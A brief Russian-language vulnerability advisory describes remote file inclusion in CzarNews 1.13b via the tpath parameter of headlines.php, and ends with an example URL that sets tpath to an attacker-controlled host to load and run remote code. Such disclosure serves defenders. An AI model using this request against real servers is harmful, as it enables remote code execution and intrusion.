Программа: CzarNews 1.13b
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе с привилегиями
web сервера. Уязвимость существует из-за
некорректной обработки входных данных в
переменной tpath. Удаленный пользователь
может изменить значение этой переменной на
произвольный URL и выполнить одноименные
сценарии на сервере. Для успешной
эксплуатации уязвимости 'register_globals' и 'allow_url_fopen'
должны быть включены в конфигурационном
файле php на целевом сервере.
Пример:
http://192.168.0.115/research/news/CzarNewsv113b/headlines.php?tpath= http://attackerip/
